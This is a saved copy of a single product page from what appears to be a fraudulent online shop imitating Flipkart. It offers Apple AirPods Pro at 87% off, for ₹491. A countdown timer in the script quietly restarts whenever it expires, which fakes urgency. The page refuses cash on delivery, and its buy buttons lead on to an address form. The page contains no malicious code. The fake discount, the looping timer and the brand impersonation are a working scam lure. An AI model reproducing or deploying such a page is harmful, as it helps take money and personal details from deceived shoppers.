<!DOCTYPE html>
<html lang="en-IN">


<!-- Mirrored from shop.backdropjhilmil.work/polls/product/8 by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 08 Apr 2024 08:09:02 GMT -->
<!-- Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <title>We are Here to help you, Electronics, Furniture, Grocery, Lifestyle, Books &amp; More. Exclusive Offers!
    </title>
    <link rel="icon" type="image/x-icon" href="../../static/polls/img/favicon.png">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="Keywords" content="Online Shopping in India,online Shopping store,Online Shopping Site,Buy Online,Shop Online,Fliipkart">
    <meta name="Description" content="India&#39;s biggest online store for Mobiles, Fashion (Clothes/Shoes), Electronics, Home Appliances, Books, Jewelry, Home, Furniture, Sporting goods, Beauty &amp; Personal Care, Grocery and more! Find the largest selection from all brands at the lowest prices in India. Payment options - COD, EMI, Credit card, Debit card &amp; more.">
    <meta property="og:title" content="We are Here To Help You">
    <meta name="theme-color" content="#2874f0" id="themeColor">
    <meta name="viewport" content="width=device-width,minimum-scale=1,user-scalable=no">
    <link rel="stylesheet" href="../../static/polls/css/bootstrap.min.css">
    <link rel="stylesheet" href="../../static/polls/css/style.css">
    <script src="../../../code.jquery.com/jquery-3.7.1.js" integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4=" crossorigin="anonymous"></script>
    <style>
        .love-icon {
            width: 36px;
            height: 36px;
            display: block;
            background-color: #fff;
            background-repeat: no-repeat;
            background-position: center;
            background-image: url("../../static/polls/img/love.png");
            background-size: 24px 24px;
            border-radius: 18px;
            position: absolute;
            right: 0;
            border: 1px solid #eee;
            padding: 24px;
            border-radius: 50%;
            z-index: 1;
        }

        .share-icon {
            width: 36px;
            height: 36px;
            display: block;
            background-color: #fff;
            background-repeat: no-repeat;
            background-position: center;
            background-image: url("../../static/polls/img/share.png");
            background-size: 24px 24px;
            border-radius: 18px;
            position: absolute;
            right: 0;
            border: 1px solid #eee;
            padding: 24px;
            border-radius: 50%;
            z-index: 1;
            top: 60px;
        }

        .carousel-item img {
            height: auto;
            width: 100%;
        }

        .color-div img {
            max-height: 110px;
            padding: 10px;
            height: unset;
            width: 100% !important;
            object-fit: cover;
        }
    </style>
</head>

<body class="expansion-alids-init" cz-shortcut-listen="true">
    <div id="container" style="overflow:hidden">
        <div style="height:100%" data-reactroot="">
            <div class="container-fluid py-2 header-container" style="background-color:#2874f0">
                <div class="row header">
                    <div class="col-1">
                        <div class="menu-icon" id="back_btn">
                            <svg width="19" height="16" viewBox="0 0 19 16" xmlns="http://www.w3.org/2000/svg">
                                <path d="M17.556 7.847H1M7.45 1L1 7.877l6.45 6.817" stroke="#FFF" stroke-width="1.5"
                                    stroke-linecap="round" stroke-linejoin="round" fill="none"></path>
                            </svg>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="menu-logo">
                            <img alt="menu" src="../../static/polls/img/logo.png" height="30px">
                        </div>
                    </div>
                    <div class="col-6">
                    </div>
                    <div class="col-1">
                        <div class="menu-icon">
                            <svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">
                                <g fill="#FFF" fill-rule="evenodd">
                                    <path
                                        d="m11.618 9.897l4.225 4.212c.092.092.101.232.02.313l-1.465 1.46c-.081.081-.221.072-.314-.02l-4.216-4.203" />
                                    <path
                                        d="m6.486 10.901c-2.42 0-4.381-1.956-4.381-4.368 0-2.413 1.961-4.369 4.381-4.369 2.42 0 4.381 1.956 4.381 4.369 0 2.413-1.961 4.368-4.381 4.368m0-10.835c-3.582 0-6.486 2.895-6.486 6.467 0 3.572 2.904 6.467 6.486 6.467 3.582 0 6.486-2.895 6.486-6.467 0-3.572-2.904-6.467-6.486-6.467" />
                                </g>
                            </svg>
                        </div>
                    </div>
                    <div class="col-1">
                        <div class="menu-icon">
                            <svg width="16" height="16" viewBox="0 0 15 15" xmlns="external452e452e452e452e452e.html?link=http://www.w3.org/2000/svg">
                                <g fill="#fff" fill-rule="evenodd">
                                    <path
                                        d="m5.189 13.04c0 .996-.791 1.804-1.767 1.804-.976 0-1.767-.808-1.767-1.804 0-.996.791-1.804 1.767-1.804.976 0 1.767.808 1.767 1.804">
                                    </path>
                                    <path
                                        d="m14.912 2.259h-14.298l2.247 6.917c.042.129.16.216.293.216h8.06c-.064.69-.629 1.841-1.702 1.841h-6.04l1.072 1.991h5.611c1.881 0 2.938-2.278 3.657-4.719.888-3.01 1.219-6.245 1.106-6.245">
                                    </path>
                                    <path
                                        d="m.615 2.259l-.592-1.828c-.08-.207.069-.431.287-.431h1.482c.126 0 .24.079.287.198l.682 2.061c0 0-.63 1.642-1.942.066">
                                    </path>
                                    <path d="m2.262.756c0 0 .498 1.503 2.234 1.503l-1.736.749-1.104-.749.607-1.503">
                                    </path>
                                    <path
                                        d="m13.424 13.325c0 .837-.664 1.516-1.484 1.516-.82 0-1.484-.679-1.484-1.516 0-.837.664-1.516 1.484-1.516.82 0 1.484.679 1.484 1.516">
                                    </path>
                                </g>
                            </svg>
                        </div>
                    </div>
                </div>
            </div>

            <div class="_1fhgRH mb-5">
                <div class="container p-1 card">
                    <div class="container-fluid px-0 product-slider">
                        <div class="love-icon"></div>
                        <div class="share-icon"></div>
                        <div id="sliderX" class="carousel slide" data-ride="carousel">
                            <ol class="carousel-indicators">
                                <li data-bs-target="#sliderX" data-bs-slide-to="0" class="active"></li>
                                <li data-bs-target="#sliderX" data-bs-slide-to="2" class=""></li>
                            </ol>
                            <div class="carousel-inner">
                                <div class="carousel-item active">
                                    <img class="d-block img-fluid m-auto" src="../../media/polls/images/1_nDUy96V.jpg">
                                </div>
                                <div class="carousel-item">
                                    <img class="d-block img-fluid m-auto" src="../../media/polls/images/2_zaopEMa.jpg">
                                </div>

                                <div class="carousel-item">
                                    <img class="d-block img-fluid m-auto" src="../../media/polls/images/3_8LJv0rT.jpg">
                                </div>


                                <div class="carousel-item">
                                    <img class="d-block img-fluid m-auto" src="../../media/polls/images/4_g101DLF.jpg">
                                </div>

                            </div>
                        </div>

                        <div class="color-div">

                            <h4>Select Color</h4>
                            <div class="color-list p-2">

                                <div class="color-item p-2 me-2 Blue active" id="autoClickBtn" onclick="manage_color_click('Blue');">
                                    <img src="../../media/polls/images/1_nDUy96V.jpg" alt="img0">
                                    <span class="color-name">white</span>
                                </div>



                            </div>

                        </div>



                    </div>
                </div>
                <div class="container-fluid p-3 mt-1 card">
                    <div class="product-title">APPLE AirPods Pro (2nd generation)</div>
                    <img style="width: 100px" class="my-2" src="../../static/polls/img/plue-fassured.png" alt="plue-fassured">
                    <div class="product-price d-flex my-2">
                        <span class="discount">87% off</span>
                        <span class="mrp" id="mrp">₹ 24,990</span>
                        <span class="price" id="price">₹ 491.00</span>
                    </div>
                </div>
                <div class="container-fluid p-3 offerend-container card">
                    <h4 class="m-0"> Offer ends in <span class="offer-timer" id="offerend-time"></span>
                </div>
                <div class="container-fluid p-3 mb-1 card">
                    <img class="my-2" src="../../static/polls/img/pay-latter.png" alt="pay-latter">
                </div>
                <div class="container-fluid px-2 py-3 d-flex feature-container product-extra card">
                    <div class="col-4 featured-item d-flex align-items-center flex-column bd-highlight px-1">
                        <img class="featured-img mb-3" src="../../static/polls/img/replacement.png" />
                        <span class="feature-title"> 7 days Replacement </span>
                    </div>
                    <div class="col-4 featured-item d-flex align-items-center flex-column bd-highlight px-1">
                        <img class="featured-img mb-3" src="../../static/polls/img/non-cod.png" />
                        <span class="feature-title"> No Cash On Delivery </span>
                    </div>
                    <div class="col-4 featured-item d-flex align-items-center flex-column bd-highlight px-1">
                        <img class="featured-img mb-3 mt-1" src="../../static/polls/img/plue-fassured.png" />
                        <span class="feature-title"> Plus (F-Assured) </span>
                    </div>
                </div>
                <div class="container-fluid product-detail px-0 py-3 mb-4 card">
                    <div class="product-details">
                        <p><img src="../../media/polls/images/download_HuVqBZD.jpg" alt=""><br></p>
                    </div>
                </div>
            </div>
            <div class="button-container flex">
                <button class="buynow-button buynow-button-white product-page-buy" onclick="buyNow()">
                    Add to Cart </button>
                <button class="buynow-button product-page-buy" onclick="buyNow()">
                    Buy Now </button>
            </div>
        </div>
        <script>
            function buyNow() {
                window.location.href = '../address/8.html'
            }
        </script>
        <footer class="seofooter" id="seofooter">
        </footer>

        <script>
            var product_data;
            var selected_verient;
            var first_click = true;
            var selected_color = "",
                selected_size = "",
                selected_storage = "";
            $(function() {
                get_product_details();
            });

            $(document).ready(function() {
                $("#back_btn").on("click", function() {
                    history.back();
                });
                startTimer(1111 - 120, $('#offerend-time'));
            });

            function startTimer(duration, display) {
                var timer = duration,
                    minutes, seconds;
                setInterval(function() {
                    minutes = parseInt(timer / 60, 10);
                    seconds = parseInt(timer % 60, 10);

                    minutes = minutes < 10 ? "0" + minutes : minutes;
                    seconds = seconds < 10 ? "0" + seconds : seconds;

                    display.text(minutes + "min " + seconds + "sec");

                    if (--timer < 0) {
                        timer = duration;
                    }
                }, 1000);
            }

            async function get_product_details(data) {
                if (data && data != null && data.status == true) {
                    var productData = data.data;
                    product_data = productData;
                    $(".product-title").html(product_data.name);
                    manage_verient_selection(productData);
                    return false;
                } else if (data && data != null && data.status == false) {
                    // showError(data.message);
                    $("#home_page_product").html("<h1 class='no-data-found'>" + data.message + "</h1>");
                    dataAvailable = false;
                    return false;
                } else if (!data) {
                    var req_data = {
                        op: "get_product_details",
                        id: PRIMARY_ID,
                    };
                    doAPICall(req_data, function(res) {
                        get_product_details(res)
                    });
                }
                return false;
            }

            function manage_slider(verient) {

                var html = `<div class="carousel-item active">
        <img class="d-block img-fluid m-auto" style="height: 400px;" src="${verient.img1}">
    </div>`;
                var control_html = `<li data-bs-target="#sliderX" data-bs-slide-to="0" class="active"></li>`;
                if (verient.img2) {
                    html += `<div class="carousel-item">
            <img class="d-block img-fluid m-auto" style="height: 400px;" src="${verient.img2}">
        </div>`;
                    control_html += `<li data-bs-target="#sliderX" data-bs-slide-to="1"></li>`;
                }
                if (verient.img3) {
                    html += `<div class="carousel-item">
            <img class="d-block img-fluid m-auto" style="height: 400px;" src="${verient.img3}">
        </div>`;
                    control_html += `<li data-bs-target="#sliderX" data-bs-slide-to="2"></li>`;
                }
                if (verient.img4) {
                    html += `<div class="carousel-item">
            <img class="d-block img-fluid m-auto" style="height: 400px;" src="${verient.img4}">
        </div>`;
                    control_html += `<li data-bs-target="#sliderX" data-bs-slide-to="3"></li>`;
                }
                if (verient.img5) {
                    html += `<div class="carousel-item">
            <img class="d-block img-fluid m-auto" style="height: 400px;" src="${verient.img5}">
        </div>`;
                    control_html += `<li data-bs-target="#sliderX" data-bs-slide-to="4"></li>`;
                }
                $(".carousel-inner").html(html);
                $(".carousel-indicators").html(control_html);
            }

            function manage_verient_selection(verient) {
                var colors = verient.colors;
                var storages = verient.storages.split(',');
                var sizes = verient.sizes.split(',');

                if (verient.colors != "" && colors.length > 0) {
                    $(".color-div").show();
                    var html = "";
                    colors.forEach(function(color, i) {
                        var isactive = '';
                        if (i == 0) {
                            isactive = 'active';
                            selected_color = color.color_name;
                        }
                        html += `<div class="color-item p-2 me-2 ${isactive} ${color.color_name.replace(/ /g, "_").replace(/\//g, "_").replace(/-/g, "_")}" onclick="manage_color_click('${color.color_name}');">
                    <img src="${color.color_img}" alt="img${i}">
                    <span class="color-name">${color.color_name}</span>
                </div>`;
                    });
                    $(".color-list").html(html);
                    manage_color_click(selected_color, true);
                } else {
                    $(".color-div").hide();
                }

                if (verient.storages != "" && storages.length > 0) {
                    $(".storage-div").show();
                    var html = "";
                    storages.forEach(function(storage, i) {
                        var isactive = '';
                        if (i == 0) {
                            isactive = 'active';
                            selected_storage = storage;
                        }
                        html += `<div class="storage-item p-2 me-2 ${isactive} ${storage.replace(/ /g, "_").replace(/\//g, "_").replace(/-/g, "_")}" onclick="manage_storage_click('${storage}');">
                    <span class="storage-name">${storage}</span>
                </div>`;
                    });
                    $(".storage-list").html(html);
                    manage_storage_click(selected_storage, true);
                } else {
                    $(".storage-div").hide();
                }

                first_click = false;
                if (verient.sizes != "" && sizes.length > 0) {
                    $(".size-div").show();
                    var html = "";
                    sizes.forEach(function(size, i) {
                        var isactive = '';
                        if (i == 0) {
                            isactive = 'active';
                            selected_size = size;
                        }
                        html += `<div class="size-item p-2 me-2 ${isactive} ${size.replace(/ /g, "_").replace(/\//g, "_").replace(/-/g, "_")}" onclick="manage_size_click('${size}');">
                    <span class="size-name">${size}</span>
                </div>`;
                    });
                    $(".size-list").html(html);
                    manage_size_click(selected_size, true);
                } else {
                    $(".size-div").hide();
                }
                manage_price();

            }

            function manage_color_click(color, firstClick = false) {
                $(".color-item").removeClass('active');
                $(".color-item." + color.replace(/ /g, "_").replace(/\//g, "_").replace(/-/g, "_")).addClass('active');
                var selectedData = product_data.verients.filter(verient => verient.color == color);
                manage_slider(selectedData[0]);
                selected_color = color;
                if (!firstClick) {
                    manage_price();
                }
            }

            function manage_storage_click(storage, firstClick = false) {
                $(".storage-item").removeClass('active');
                $(".storage-item." + storage.replace(/ /g, "_").replace(/\//g, "_").replace(/-/g, "_")).addClass('active');
                selected_storage = storage;
                if (!firstClick) {
                    manage_price();
                }
            }

            function manage_size_click(size, firstClick = false) {
                $(".size-item").removeClass('active');
                $(".size-item." + size.replace(/ /g, "_").replace(/\//g, "_").replace(/-/g, "_")).addClass('active');
                selected_size = size;
                if (!firstClick) {
                    manage_price();
                }
            }

            function manage_price() {
                selected_verient = product_data.verients.filter(verient => verient.color == selected_color).filter(verient => verient.storage == selected_storage).filter(verient => verient.size == selected_size);
                selected_verient = selected_verient[0];
                $(".mrp").html(selected_verient.mrp);
                $(".price").html("&#8377;" + selected_verient.selling_price);
                var disc = 100 - ((selected_verient.selling_price * 100) / selected_verient.mrp).toFixed(0);
                $(".discount").html(disc + "% off");
                $(".product-details").html(selected_verient.features);
            }

            window.onload = function() {
                document.getElementById('autoClickBtn').click();
                document.getElementById('autoClickBtn1').click();
                document.getElementById('autoClickBtn2').click();
            }
        </script>

        <script defer src="../../static/polls/bootstrap.min.js"></script>
</body>


<!-- Mirrored from shop.backdropjhilmil.work/polls/product/8 by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 08 Apr 2024 08:09:05 GMT -->

</html>